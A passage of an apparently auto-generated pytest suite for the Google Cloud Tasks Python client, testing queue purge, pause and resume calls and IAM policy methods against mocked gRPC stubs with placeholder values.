with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
call.return_value = queue.Queue()
client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_purge_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PurgeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.purge_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_purge_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.purge_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_purge_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.purge_queue(
cloudtasks.PurgeQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_purge_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_queue), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.purge_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_purge_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.purge_queue(
cloudtasks.PurgeQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.PauseQueueRequest, dict,])
def test_pause_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PauseQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
def test_pause_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
client.pause_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PauseQueueRequest()
@pytest.mark.asyncio
async def test_pause_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.PauseQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(name="name_value", state=queue.Queue.State.RUNNING,)
)
response = await client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.PauseQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_pause_queue_async_from_dict():
await test_pause_queue_async(request_type=dict)
def test_pause_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PauseQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
call.return_value = queue.Queue()
client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_pause_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.PauseQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.pause_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_pause_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.pause_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_pause_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.pause_queue(
cloudtasks.PauseQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_pause_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.pause_queue), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.pause_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_pause_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.pause_queue(
cloudtasks.PauseQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.ResumeQueueRequest, dict,])
def test_resume_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ResumeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
def test_resume_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
client.resume_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ResumeQueueRequest()
@pytest.mark.asyncio
async def test_resume_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.ResumeQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(name="name_value", state=queue.Queue.State.RUNNING,)
)
response = await client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ResumeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_resume_queue_async_from_dict():
await test_resume_queue_async(request_type=dict)
def test_resume_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ResumeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
call.return_value = queue.Queue()
client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_resume_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ResumeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_resume_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.resume_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_resume_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.resume_queue(
cloudtasks.ResumeQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_resume_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.resume_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_resume_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.resume_queue(
cloudtasks.ResumeQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [iam_policy_pb2.GetIamPolicyRequest, dict,])
def test_get_iam_policy(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy(version=774, etag=b"etag_blob",)
response = client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.GetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_get_iam_policy_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
client.get_iam_policy()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.GetIamPolicyRequest()
@pytest.mark.asyncio
async def test_get_iam_policy_async(
transport: str = "grpc_asyncio", request_type=iam_policy_pb2.GetIamPolicyRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy_pb2.Policy(version=774, etag=b"etag_blob",)
)
response = await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.GetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
@pytest.mark.asyncio
async def test_get_iam_policy_async_from_dict():
await test_get_iam_policy_async(request_type=dict)
def test_get_iam_policy_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
call.return_value = policy_pb2.Policy()
client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_iam_policy_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_get_iam_policy_from_dict_foreign():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
response = client.get_iam_policy(
request={
"resource": "resource_value",
"options": options_pb2.GetPolicyOptions(requested_policy_version=2598),
}
)
call.assert_called()
def test_get_iam_policy_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
def test_get_iam_policy_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_iam_policy(
iam_policy_pb2.GetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.asyncio
async def test_get_iam_policy_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_iam_policy_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_iam_policy(
iam_policy_pb2.GetIamPolicyRequest(), resource="resource_value",
)
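# Illustrative sketch, not part of the generated suite: a tiny helper that pulls the
# routing header out of a mocked call, relying only on module-level names already used
# above (mock, ga_credentials, iam_policy_pb2, policy_pb2). The helper and test names
# are hypothetical additions, not generator output.
def _example_routing_params(call):
    # mock_calls entries unpack as (name, args, kwargs); the routing header travels in
    # the "metadata" keyword as a sequence of (key, value) pairs.
    _, _, kw = call.mock_calls[0]
    return dict(kw["metadata"]).get("x-goog-request-params")
def test_example_routing_params_helper():
    client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
    request = iam_policy_pb2.GetIamPolicyRequest()
    request.resource = "resource/value"
    with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
        call.return_value = policy_pb2.Policy()
        client.get_iam_policy(request)
    assert _example_routing_params(call) == "resource=resource/value"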
@pytest.mark.parametrize("request_type", [iam_policy_pb2.SetIamPolicyRequest, dict,])
def test_set_iam_policy(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy(version=774, etag=b"etag_blob",)
response = client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.SetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_set_iam_policy_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
client.set_iam_policy()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.SetIamPolicyRequest()
@pytest.mark.asyncio
async def test_set_iam_policy_async(
transport: str = "grpc_asyncio", request_type=iam_policy_pb2.SetIamPolicyRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy_pb2.Policy(version=774, etag=b"etag_blob",)
)
response = await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.SetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
@pytest.mark.asyncio
async def test_set_iam_policy_async_from_dict():
await test_set_iam_policy_async(request_type=dict)
def test_set_iam_policy_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
call.return_value = policy_pb2.Policy()
client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_set_iam_policy_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_set_iam_policy_from_dict_foreign():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
response = client.set_iam_policy(
request={
"resource": "resource_value",
"policy": policy_pb2.Policy(version=774),
}
)
call.assert_called()
def test_set_iam_policy_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.set_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
def test_set_iam_policy_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_iam_policy(
iam_policy_pb2.SetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.asyncio
async def test_set_iam_policy_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.set_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_set_iam_policy_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.set_iam_policy(
iam_policy_pb2.SetIamPolicyRequest(), resource="resource_value",
)
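# Illustrative sketch, not generator output: the "flattened error" checks above generalize;
# passing a request object together with flattened keyword arguments raises ValueError
# before any RPC is attempted. The method/argument pairs simply mirror tests in this file,
# and the test name is hypothetical.
@pytest.mark.parametrize(
    "method_name, request_obj, flattened_kwargs",
    [
        (
            "get_iam_policy",
            iam_policy_pb2.GetIamPolicyRequest(),
            {"resource": "resource_value"},
        ),
        (
            "set_iam_policy",
            iam_policy_pb2.SetIamPolicyRequest(),
            {"resource": "resource_value"},
        ),
    ],
)
def test_example_request_and_flattened_are_exclusive(
    method_name, request_obj, flattened_kwargs
):
    client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
    with pytest.raises(ValueError):
        getattr(client, method_name)(request_obj, **flattened_kwargs)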
@pytest.mark.parametrize(
"request_type", [iam_policy_pb2.TestIamPermissionsRequest, dict,]
)
def test_test_iam_permissions(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
response = client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.TestIamPermissionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy_pb2.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
client.test_iam_permissions()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.TestIamPermissionsRequest()
@pytest.mark.asyncio
async def test_test_iam_permissions_async(
transport: str = "grpc_asyncio",
request_type=iam_policy_pb2.TestIamPermissionsRequest,
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
)
response = await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.TestIamPermissionsRequest()
# Establish that the response is the type that we expect.
